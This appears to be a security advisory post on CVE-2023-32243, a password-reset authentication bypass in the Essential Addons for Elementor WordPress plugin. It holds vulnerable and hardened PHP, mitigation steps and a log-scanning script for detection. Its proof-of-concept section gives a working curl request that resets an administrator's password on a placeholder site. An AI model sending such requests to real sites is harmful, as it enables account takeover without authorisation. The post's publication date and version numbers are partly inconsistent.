Published: June 2024  
Vulnerability Type: Improper Authentication / Privilege Escalation  
Affected Plugin: WPDeveloper Essential Addons for Elementor  
Affected Versions: 5.4. up to 5.7.1 (inclusive)  
Patched Version: 5.7.2

TL;DR

A critical bug in the Essential Addons for Elementor WordPress plugin lets hackers easily escalate their privileges, possibly up to administrator, on any unpatched site running plugin versions 5.4. to 5.7.1. This problem arises from improper authentication in the password reset feature—meaning attackers can reset passwords for any user if they know the username or email. Patching to 5.7.2+ is essential.

What's Essential Addons for Elementor?

If you use Elementor, you probably know Essential Addons—it’s one of the most popular add-on packs, with over a million installs, giving site owners new widgets like post grids, sliders, and more. Unfortunately, popularity makes it a big target for hackers.

What is CVE-2023-32243?

CVE-2023-32243 highlights a critical improper authentication vulnerability. The bug exists in plugin versions 5.4. to 5.7.1, in code that handles user password resets. Normally, WordPress password reset flows confirm user identity by verifying unique tokens. This bug bypasses that check, letting anyone reset passwords for existing users.

This means:  
If an attacker knows anyone’s username (even the site admin!), they can change that user’s password and take over the account—no email required.

Original References and Sources

- Patchstack Security Advisory
- WPScan Vulnerability Details
- Plugin’s Official Changelog

The vulnerability lives in the following password reset handler (simplified for readability):

// vulnerable code in includes/Classes/eael-user-login.php

public function process_reset_password() {
    $user = get_user_by('login', $_POST['user_login']);
    if(!$user) {
        return ['error' => 'User not found!'];
    }
    // ... no token check!
    reset_password($user, $_POST['new_password']);
    return ['success' => 'Password reset successfully!'];
}

This code ONLY checks if the user exists, but does not confirm password reset tokens that WordPress normally sends by email. An attacker can simply POST directly to this handler with any username and a new password—overwriting any account credentials.
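For contrast, here is what the same handler looks like once the missing check is put back. This is an added example written for this post, not the plugin's actual 5.7.2 patch: it keeps the page's AJAX action name `eael_reset_password` but assumes the reset key is posted as `rp_key` and the CSRF nonce as `nonce` (both parameter names are assumptions), and that the key was issued earlier in the flow with WordPress core's `get_password_reset_key()` and emailed to the user. Every WordPress function called here (`check_ajax_referer`, `check_password_reset_key`, `reset_password`, `sanitize_user`, `wp_unslash`) is a real core API.

```php
<?php
// Added example, not the plugin's own code: a hardened version of the
// reset handler quoted above. Assumes the key is posted as "rp_key" and the
// nonce as "nonce" (parameter names assumed), and that the key was issued
// with get_password_reset_key() and sent to the user's e-mail address.

class Hardened_User_Login {

    public function process_reset_password() {
        // 1. Reject requests that did not come from the plugin's own reset
        //    form (CSRF protection). The page's AJAX action name is reused
        //    here as the nonce action; that pairing is an assumption.
        if ( ! check_ajax_referer( 'eael_reset_password', 'nonce', false ) ) {
            return [ 'error' => 'Invalid request.' ];
        }

        $login    = isset( $_POST['user_login'] )   ? sanitize_user( wp_unslash( $_POST['user_login'] ) )      : '';
        $key      = isset( $_POST['rp_key'] )       ? sanitize_text_field( wp_unslash( $_POST['rp_key'] ) )    : '';
        $new_pass = isset( $_POST['new_password'] ) ? wp_unslash( $_POST['new_password'] )                     : '';

        if ( '' === $login || '' === $key || '' === $new_pass ) {
            return [ 'error' => 'Missing required fields.' ];
        }

        // 2. The check the vulnerable code skipped: validate the key that
        //    WordPress e-mailed for this login. Core compares it against the
        //    stored hash and enforces the expiry window, and returns a
        //    WP_Error on an unknown user, a mismatch, or an expired key.
        $user = check_password_reset_key( $key, $login );
        if ( is_wp_error( $user ) ) {
            // One generic message for every failure case, so the endpoint
            // cannot be used to tell valid usernames from invalid ones.
            return [ 'error' => 'Invalid or expired reset link.' ];
        }

        // 3. Only now change the password. Core's reset_password() clears
        //    the stored activation key, so the same key cannot be replayed.
        reset_password( $user, $new_pass );

        return [ 'success' => 'Password reset successfully!' ];
    }
}
```

With this version, a request that carries only `user_login` and `new_password` fails at the nonce check, and a request with a forged nonce still fails at `check_password_reset_key()`, because the caller never received the key that WordPress generated for that account.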

Proof-of-Concept (PoC) Exploit

Below you'll find a simple proof-of-concept using curl. Just replace the target site and username.

curl -X POST 'https://victim-site.com/wp-admin/admin-ajax.php' \
    -d 'action=eael_reset_password' \
    -d 'user_login=admin' \
    -d 'new_password=SuperSecure123!'

That’s it: if the site is running a vulnerable version, the admin’s password is now “SuperSecure123!”.

- No email access or valid reset token needed.
- Works for all users (admins, editors, regular), as long as the username is known or guessed.

Mitigation

1. Update Essential Addons for Elementor immediately to 5.7.2 or later.
   - Official download: wordpress.org/plugins/essential-addons-for-elementor/
2. Check user accounts for unauthorized changes. If you see unexpected password changes, investigate.
3. Monitor server logs for suspicious POST requests to /wp-admin/admin-ajax.php calling action=eael_reset_password.
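To make step 3 concrete, here is an added example (written for this post, not from the original advisory or the plugin) of a small PHP CLI script that scans log lines for the pattern described: POST requests to admin-ajax.php invoking `action=eael_reset_password`, summarised per source IP and per targeted username. One caveat a practitioner should keep in mind: a stock combined-format access log records only the request line, so the POST body, and the action name inside it, is invisible there. The action is visible only when it travels in the query string, or when the server is configured to log the request body (for nginx, a custom `log_format` that appends `$request_body`). The script therefore parses the combined format plus one trailing quoted body field; that format, the sample lines, and the IP addresses are all constructed for the example.

```php
<?php
// Added example, not from the original post: scan web-server log lines for
// POST requests to admin-ajax.php carrying action=eael_reset_password (the
// action name quoted in the post) and summarise them per source IP.
// Format parsed: combined log format + one trailing quoted request-body
// field (constructed; e.g. an nginx log_format ending in "$request_body").
// Requires PHP 8.0+ for str_ends_with().

const RESET_ACTION = 'eael_reset_password';
const AJAX_PATH    = '/wp-admin/admin-ajax.php';

/** Parse one line; returns null for lines that do not match the format. */
function parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "[^"]*"(?: "([^"]*)")?$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'target' => $m[4],
        'status' => (int) $m[5],
        'body'   => $m[6] ?? '',   // absent when the body was not logged
    ];
}

/** Merge query-string and body parameters; body wins on duplicate keys. */
function request_params(array $req): array {
    parse_str((string) parse_url($req['target'], PHP_URL_QUERY), $query);
    parse_str($req['body'], $body);
    return array_merge($query, $body);
}

/** True for a POST to admin-ajax.php that invokes the reset action. */
function is_reset_attempt(array $req): bool {
    if ($req['method'] !== 'POST') {
        return false;
    }
    $path = (string) parse_url($req['target'], PHP_URL_PATH);
    if (!str_ends_with($path, AJAX_PATH)) {   // tolerate subdirectory installs
        return false;
    }
    return (request_params($req)['action'] ?? '') === RESET_ACTION;
}

/** Per-IP attempt counts plus the set of usernames each IP tried to reset. */
function summarise(array $lines): array {
    $report = [];
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null || !is_reset_attempt($req)) {
            continue;
        }
        $ip   = $req['ip'];
        $user = request_params($req)['user_login'] ?? '(none)';
        $report[$ip]['attempts'] = ($report[$ip]['attempts'] ?? 0) + 1;
        $report[$ip]['users'][$user] = true;
        $report[$ip]['first_seen'] ??= $req['time'];
    }
    // An HTTP 200 does not prove the reset succeeded: the handler quoted in
    // the post answers 200 for its error response too. Treat every hit as an
    // incident lead and confirm against the affected accounts directly.
    return $report;
}

// Constructed sample input (documentation IP ranges from RFC 5737).
$sample = [
    '203.0.113.7 - - [12/May/2023:10:01:22 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 61 "-" "curl/7.88.1" "action=eael_reset_password&user_login=admin&new_password=SuperSecure123%21"',
    '203.0.113.7 - - [12/May/2023:10:01:23 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 61 "-" "curl/7.88.1" "action=eael_reset_password&user_login=editor&new_password=SuperSecure123%21"',
    '198.51.100.4 - - [12/May/2023:10:02:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "https://example.com/" "Mozilla/5.0" "action=heartbeat&_nonce=abc"',
    '192.0.2.9 - - [12/May/2023:10:03:10 +0000] "POST /blog/wp-admin/admin-ajax.php?action=eael_reset_password HTTP/1.1" 200 61 "-" "python-requests/2.31" "user_login=admin&new_password=x"',
    '192.0.2.9 - - [12/May/2023:10:03:11 +0000] "GET /blog/wp-login.php HTTP/1.1" 200 4096 "-" "python-requests/2.31"',
];

foreach (summarise($sample) as $ip => $info) {
    printf("%-14s %d attempt(s) since %s, users: %s\n",
        $ip, $info['attempts'], $info['first_seen'], implode(', ', array_keys($info['users'])));
}
```

Run it with `php scan.php` after pointing `$sample` at `file('/var/log/nginx/access.log', FILE_IGNORE_NEW_LINES)`. The heartbeat call is ignored, the query-string variant from the subdirectory install is caught, and the two usernames tried from the first IP are listed together, which is the shape of evidence you want before checking those accounts for unexpected password changes (step 2 above).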

Has This Been Exploited in the Wild?

Yes. According to Patchstack and several other major threat intelligence sources, real-world attacks began hours after public disclosure.

Conclusion

CVE-2023-32243 is a textbook case of how a small code mistake—skipping a token check—can lead to complete site takeover. If you run Elementor with Essential Addons, and haven’t patched, you are almost certainly being probed by bots right now.

Further Reading

- WordPress Password Reset Security: What Developers Should Know
- How to Secure Popular WordPress Plugins

Timeline

Published on: 05/12/2023 08:15:00 UTC
Last modified on: 05/23/2023 20:17:00 UTC